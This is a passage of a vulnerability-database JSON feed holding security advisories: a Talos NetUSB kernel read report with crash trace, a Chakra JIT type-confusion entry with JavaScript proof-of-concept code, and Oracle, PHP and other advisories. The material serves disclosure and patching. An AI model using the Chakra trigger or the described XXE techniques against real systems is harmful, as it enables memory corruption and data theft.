(do_DataAbort+0x30/0x98) from [<c0463a8c>] (__dabt_svc+0x4c/0x60)\n [ 119.500000] Exception stack(0xca00ff18 to 0xca00ff60)\n [ 119.500000] ff00: ca8ed400 a0000013\n [ 119.510000] ff20: 00000000 ca8ed628 cf937fe0 414140fd ca8ed400 bf124f1c 00000000 00000000\n [ 119.520000] ff40: 00000000 00000000 cf937fe0 ca00ff60 bf118e30 bf118e68 20000013 ffffffff\n [ 119.530000] [<c0463a8c>] (__dabt_svc+0x4c/0x60) from [<bf118e68>] (SoftwareBus_reportConfigDescGot+0x90/0x268 [NetUSB])\n [ 119.540000] [<bf118e68>] (SoftwareBus_reportConfigDescGot+0x90/0x268 [NetUSB]) from [<bf11ec68>] (SoftwareBusWorkThreadProc+0x90/0xc4 [NetUSB])\n [ 119.550000] [<bf11ec68>] (SoftwareBusWorkThreadProc+0x90/0xc4 [NetUSB]) from [<bf124f70>] (_thread_create_helper+0x54/0x114 [NetUSB])\n [ 119.560000] [<bf124f70>] (_thread_create_helper+0x54/0x114 [NetUSB]) from [<c0078cdc>] (kthread+0x84/0x8c)\n [ 119.570000] [<c0078cdc>] (kthread+0x84/0x8c) from [<c0040b58>] (kernel_thread_exit+0x0/0x8)\n [ 119.580000] dump_kmsg: dump list lock is held during panic, skipping dump\n [ 119.590000] CPU1: stopping\n [ 119.590000] [<c0046358>] (unwind_backtrace+0x0/0xe4) from [<c003f2f0>] (do_IPI+0xfc/0x180)\n [ 119.590000] [<c003f2f0>] (do_IPI+0xfc/0x180) from [<c0463ae8>] (__irq_svc+0x48/0xe8)\n [ 119.590000] Exception stack(0xcf83df98 to 0xcf83dfe0)\n [ 119.590000] df80: 00000000 cd7e0f00\n [ 119.590000] dfa0: cf83dfe0 00000000 cf83c000 c04b0bc8 c04d50a8 c04d5220 80000000 413fc090\n [ 119.590000] dfc0: 0000001f 00000000 c0508cd8 cf83dfe0 c0040bb0 c0040bb4 60000013 ffffffff\n [ 119.590000] [<c0463ae8>] (__irq_svc+0x48/0xe8) from [<c0040bb4>] (default_idle+0x24/0x28)\n [ 119.590000] [<c0040bb4>] (default_idle+0x24/0x28) from [<c0040d1c>] (cpu_idle+0x40/0x94)\n [ 119.590000] [<c0040d1c>] (cpu_idle+0x40/0x94) from [<80008110>] (0x80008110)\n [ 119.870000] NVRAM LOG 16384 33858 50242\n [ 120.080000] Rebooting in 3 seconds..Digital core power voltage set to 1.0V\n \n\n### Exploit Proof of Concept\n\nIn this example, I do not have any devices connected to the router. I use the device index `0x8a`, which will point to the computer name (placed on the stack during handshake) instead of a valid device index. The address that will be read based on the device number depends on the number of devices on the stack (since the stack will grow with additional devices). However, this value can be incremented or modified as often as the attacker would like until successful exploitation. The opcode (the byte prior to the index) in this example is `0x02` or `getConfigDescriptor`.\n\n### Timeline\n\n2019-02-01 - Vendor Disclosure \n2019-02-11 - Vendor Acknowledged & inquired about PGP \n2019-03-06 - Plain text copy of report sent & advised Netgear also aware of issue \n2019-05-08 - Follow up with vendor \n2019-05-15 - Vendor advised provided new module to NetGear \n2019-06-17 - Public Release\n\n##### Credit\n\nDiscovered by Dave McDaniel of Cisco Talos\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2019-0776\n\nPrevious Report\n\nTALOS-2019-0771\n", "edition": 3, "modified": "2019-06-14T00:00:00", "published": "2019-06-14T00:00:00", "id": "TALOS-2019-0775", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0775", "title": "KCodes NetUSB unauthenticated remote kernel arbitrary memory read vulnerability", "type": "talos", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}], "zdt": [{"lastseen": "2018-04-09T07:47:17", "description": "Exploit for windows platform in category dos / poc", "edition": 1, "published": "2017-11-26T00:00:00", "type": "zdt", "title": "Microsoft Edge Chakra JIT BailOutOnTaggedValue Bailouts Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-11839"], "modified": "2017-11-26T00:00:00", "href": "https://0day.today/exploit/description/29052", "id": "1337DAY-ID-29052", "sourceData": "Microsoft Edge: Chakra: JIT: BailOutOnTaggedValue bailouts can be generated for constant values \r\n\r\nCVE-2017-11839\r\n\r\n\r\n1.\r\nIn the Chakra's JIT compilation process, it stores variables' type information by basic block.\r\n\r\nfunction opt(b) {\r\n let o;\r\n if (b) {\r\n // BASIC BLOCK (a)\r\n o = {};\r\n } else {\r\n // BASIC BLOCK (b)\r\n o = 1.1;\r\n }\r\n // BASIC BLOCK (c)\r\n return o;\r\n}\r\n\r\nFor example, let's think the above code gets optimized. At the basic block (a), the type of \"o\" is always \"Object\". At the basic block (b), the type of \"o\" is always \"CanBeTaggedValue_Float\". At the basic block (c), it combines the two types, and marks the type of \"o\" as \"CanBeTaggedValue_Mixed\"(Object + CanBeTaggedValue_Float).\r\n\r\nExplanation of TaggedValue in Chakra: <a href=\"http://abchatra.github.io/TaggedFloat/\" title=\"\" class=\"\" rel=\"nofollow\">http://abchatra.github.io/TaggedFloat/</a>\r\n\r\nBut unlike variables, the type information of constants like numbers, strings is managed globally. This means, once a constant is marked as some type in a certain block. All blocks will treat it as that type regardless of the control flow.\r\n\r\n2.\r\nChakra uses a BailOutOnTaggedValue bailout to ensure a variable's type is \"Object\". The bailouts can be generated when inlining JavaScript functions.\r\n\r\nfunction opt(inlinee) {\r\n inlinee();\r\n}\r\n\r\nGenerated IR code for the above code:\r\n StatementBoundary #0 #0000 \r\n s6.var = StartCall 1 (0x1).i32 #0000 \r\n BailOnNotObject s3[LikelyCanBeTaggedValue_Object].var #0006 Bailout: #0006 (BailOutOnInlineFunction)\r\n s10.var = Ld_A [s3[LikelyObject].var+8].u64 #0006 \r\n BailOnNotEqual [s10.var!].i32, 26 (0x1A).i32 # Bailout: #0006 (BailOutOnInlineFunction)\r\n BailOnNotEqual [s3[LikelyObject].var+40].u64, 0xXXXXXXXX (FunctionBody [Anonymous function (#1.3), #4]).u64 # Bailout: #0006 (BailOutOnInlineFunction)\r\n\r\nAs you can see after the \"BailOnNotObject\" opcode which generates \"BailOutOnTaggedValue\" bailouts, the type of \"s3\" becomes \"LikelyObject\" from \"LikelyCanBeTaggedValue_Object\". This means there's no case where \"s3\" is not an object after the opcode which ensures its type, so it's safe to use it as an object without checks after the opcode.\r\n\r\nBut the problem is that this can be applied to constants.\r\n\r\nHere's the PoC.\r\n\r\nfunction opt2(inlinee, v) {\r\n if (v > 0) {\r\n inlinee();\r\n } else {\r\n inlinee.x = 1.1;\r\n }\r\n}\r\n\r\nfunction opt() {\r\n opt2(2.3023e-320, null);\r\n}\r\n\r\nfunction main() {\r\n opt2(() => {}, 1); // feed a function to the profiler\r\n\r\n for (let i = 0; i < 10000; i++) {\r\n opt();\r\n }\r\n}\r\n\r\nmain();\r\n\r\nWe can simply think it as follows:\r\n(NOT PRECISE just for understanding)\r\n\r\nJust after inlining:\r\n // Basic block (a)\r\n s2 = 2.30235E-320; // constant\r\n inlinee = s2; // variable\r\n if (null > 0) {\r\n // Basic block (b)\r\n BailOnNotObject(inlinee);\r\n inlinee();\r\n } else {\r\n // Basic block (c)\r\n inlinee.x = 1.1;\r\n }\r\n\r\n Type map:\r\n Constants:\r\n s2: CanBeTaggedValue_Float\r\n Basic block (a):\r\n inlinee: CanBeTaggedValue_Float\r\n Basic block (b):\r\n inlinee: CanBeTaggedValue_Float\r\n Basic block (c):\r\n inlinee: CanBeTaggedValue_Float\r\n\r\nIn the Global Optimization Phase:\r\n // Basic block (a)\r\n s2 = 2.30235E-320;\r\n if (null > 0) {\r\n // Basic block (b)\r\n BailOnNotObject(s2);\r\n s2();\r\n } else {\r\n // Basic block (c)\r\n s2.x = 1.1;\r\n }\r\n\r\n Type map:\r\n Constants:\r\n s2: CanBeTaggedValue_Float -> Float\r\n Basic block (a):\r\n Basic block (b):\r\n Basic block (c):\r\n\r\nAt the basic block (b), the BailOnNotObject opcode changes the type of \"s2\" to \"Float\". And since \"s2\" is a constant, that change affects the basic block (c). So it leads to type confusion at the basic block (c).\r\n\r\nNote: Just \"Float\" is considered an Object type.\n\n# 0day.today [2018-04-09] #", "sourceHref": "https://0day.today/exploit/29052", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4878", "CVE-2015-4877"], "description": "\r\n\r\n======================================================================\r\n\r\n Secunia Research (now part of Flexera Software) 26/10/2015\r\n\r\n Oracle Outside In Two Buffer Overflow Vulnerabilities\r\n\r\n======================================================================\r\nTable of Contents\r\n\r\nAffected Software....................................................1\r\nSeverity.............................................................2\r\nDescription of Vulnerabilities.......................................3\r\nSolution.............................................................4\r\nTime Table...........................................................5\r\nCredits..............................................................6\r\nReferences...........................................................7\r\nAbout Secunia........................................................8\r\nVerification.........................................................9\r\n\r\n======================================================================\r\n\r\n1) Affected Software\r\n\r\n* Oracle Outside In versions 8.5.0, 8.5.1, and 8.5.2.\r\n\r\n====================================================================== \r\n2) Severity\r\n\r\nRating: Moderately critical\r\nImpact: System Access\r\nWhere: From remote\r\n\r\n====================================================================== \r\n3) Description of Vulnerabilities\r\n\r\nSecunia Research has discovered two vulnerabilities in Oracle Outside\r\nIn Technology, which can be exploited by malicious people to cause a\r\nDoS (Denial of Service) and compromise an application using the SDK.\r\n\r\n1) An error in the vstga.dll when processing TGA files can be\r\nexploited to cause an out-of-bounds write memory access.\r\n\r\n2) An error in the libxwd2.dll when processing XWD files can be\r\nexploited to cause a stack-based buffer overflow.\r\n\r\nSuccessful exploitation of the vulnerabilities may allow execution of\r\narbitrary code.\r\n\r\n====================================================================== \r\n4) Solution\r\n\r\nApply update. Please see the Oracle Critical Patch Update Advisory\r\nfor October 2015 for details.\r\n\r\n====================================================================== \r\n5) Time Table\r\n\r\n14/07/2015 - Vendor notified of vulnerabilities.\r\n14/07/2015 - Vendor acknowledges report.\r\n16/07/2015 - Vendor supplied bug ticket ID.\r\n27/07/2015 - Vendor supplied information of fix in main codeline.\r\n24/09/2015 - Replied to vendor and asked about CVE references.\r\n25/09/2015 - Vendor replied that they check our request.\r\n27/09/2015 - Vendor assigned two CVE references.\r\n17/10/2015 - Vendor supplied 20/10/2015 as estimated fix date.\r\n20/10/2015 - Release of vendor patch.\r\n21/10/2015 - Public disclosure.\r\n26/10/2015 - Publication of research advisory.\r\n\r\n======================================================================\r\n\r\n6) Credits\r\n\r\nDiscovered by Behzad Najjarpour Jabbari, Secunia Research (now part\r\nof Flexera Software).\r\n\r\n======================================================================\r\n\r\n7) References\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned\r\nthe CVE-2015-4877 and CVE-2015-4878 identifiers for the\r\nvulnerabilities.\r\n\r\n======================================================================\r\n\r\n8) About Secunia (now part of Flexera Software)\r\n\r\nIn September 2015, Secunia has been acquired by Flexera Software:\r\n\r\nhttps://secunia.com/blog/435/\r\n\r\nSecunia offers vulnerability management solutions to corporate\r\ncustomers with verified and reliable vulnerability intelligence\r\nrelevant to their specific system configuration:\r\n\r\nhttp://secunia.com/advisories/business_solutions/\r\n\r\nSecunia also provides a publicly accessible and comprehensive advisory\r\ndatabase as a service to the security community and private\r\nindividuals, who are interested in or concerned about IT-security.\r\n\r\nhttp://secunia.com/advisories/\r\n\r\nSecunia believes that it is important to support the community and to\r\ndo active vulnerability research in order to aid improving the\r\nsecurity and reliability of software in general:\r\n\r\nhttp://secunia.com/secunia_research/\r\n\r\nSecunia regularly hires new skilled team members. Check the URL below\r\nto see currently vacant positions:\r\n\r\nhttp://secunia.com/corporate/jobs/\r\n\r\nSecunia offers a FREE mailing list called Secunia Security Advisories:\r\n\r\nhttp://secunia.com/advisories/mailing_lists/\r\n\r\n======================================================================\r\n\r\n9) Verification \r\n\r\nPlease verify this advisory by visiting the Secunia website:\r\nhttp://secunia.com/secunia_research/2015-04/\r\n\r\nComplete list of vulnerability reports published by Secunia Research:\r\nhttp://secunia.com/secunia_research/\r\n\r\n======================================================================\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32659", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32659", "title": "Secunia Research: Oracle Outside In Two Buffer Overflow Vulnerabilities", "type": "securityvulns", "cvss": {"score": 1.5, "vector": "AV:LOCAL/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4845"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite - Database user enumeration\r\nAdvisory ID: [ERPSCAN-15-025]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-025-oracle-e-business-suite-database-user-enumeration-vulnerability/\r\nDate published:20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: User Enumeration\r\nImpact: user enumeration, SSRF\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4845\r\nCVSS Information\r\nCVSS Base Score: 4.3 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity None (N)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nThere is a script in EBS that is used to connect to the database and\r\ndisplays the connection status. Different connection results can help\r\nan attacker to find existing database accounts.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.2.4\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin, Egor Karbutov (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nDatabase users enumeration\r\nVunerable script: Aoljtest.js\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-025-oracle-e-business-suite-database-user-enumeration-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32656", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32656", "title": "[ERPSCAN-15-025] Oracle E-Business Suite Database user enumeration Vulnerability", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-1338"], "description": "Symbolic links and hadlinks vulnerability in log files, privilege escalation.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14720", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14720", "title": "apport security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4886"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite XXE injection\r\nAdvisory ID: [ERPSCAN-15-028]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-028-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4886\r\nCVSS Information\r\nCVSS Base Score: 6.4 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Low (L)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1) An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2) An attacker can perform a DoS attack (for example, XML Entity Expansion).\r\n3) An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/copxml\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-028-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32653", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32653", "title": "[ERPSCAN-15-028] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-7747"], "description": "Crash on audiofiles processing.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14754", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14754", "title": "audiofile memory corruption", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2786-1\r\nOctober 28, 2015\r\n\r\nphp5 vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nPHP could be made to crash if it processed a specially crafted file.\r\n\r\nSoftware Description:\r\n- php5: HTML-embedded scripting language interpreter\r\n\r\nDetails:\r\n\r\nIt was discovered that the PHP phar extension incorrectly handled certain\r\nfiles. A remote attacker could use this issue to cause PHP to crash,\r\nresulting in a denial of service. (CVE-2015-7803, CVE-2015-7804)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libapache2-mod-php5 5.6.11+dfsg-1ubuntu3.1\r\n php5-cgi 5.6.11+dfsg-1ubuntu3.1\r\n php5-cli 5.6.11+dfsg-1ubuntu3.1\r\n php5-fpm 5.6.11+dfsg-1ubuntu3.1\r\n\r\nUbuntu 15.04:\r\n libapache2-mod-php5 5.6.4+dfsg-4ubuntu6.4\r\n php5-cgi 5.6.4+dfsg-4ubuntu6.4\r\n php5-cli 5.6.4+dfsg-4ubuntu6.4\r\n php5-fpm 5.6.4+dfsg-4ubuntu6.4\r\n\r\nUbuntu 14.04 LTS:\r\n libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.14\r\n php5-cgi 5.5.9+dfsg-1ubuntu4.14\r\n php5-cli 5.5.9+dfsg-1ubuntu4.14\r\n php5-fpm 5.5.9+dfsg-1ubuntu4.14\r\n\r\nUbuntu 12.04 LTS:\r\n libapache2-mod-php5 5.3.10-1ubuntu3.21\r\n php5-cgi 5.3.10-1ubuntu3.21\r\n php5-cli 5.3.10-1ubuntu3.21\r\n php5-fpm 5.3.10-1ubuntu3.21\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2786-1\r\n CVE-2015-7803, CVE-2015-7804\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/php5/5.6.11+dfsg-1ubuntu3.1\r\n https://launchpad.net/ubuntu/+source/php5/5.6.4+dfsg-4ubuntu6.4\r\n https://launchpad.net/ubuntu/+source/php5/5.5.9+dfsg-1ubuntu4.14\r\n https://launchpad.net/ubuntu/+source/php5/5.3.10-1ubuntu3.21\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32651", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32651", "title": "[USN-2786-1] PHP vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4854"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite Cross-site Scripting\r\nAdvisory ID: [ERPSCAN-15-027]\r\nAdvisory URL:http://erpscan.com/advisories/erpscan-15-027-oracle-e-business-suite-cross-site-scripting-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: Cross-site Scripting\r\nImpact: impersonation, information disclosure\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4854\r\nCVSS Information\r\nCVSS Base Score: 4.3 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality None (N)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nAn anonymous attacker can create a special link that injects malicious JS code\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.4\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL 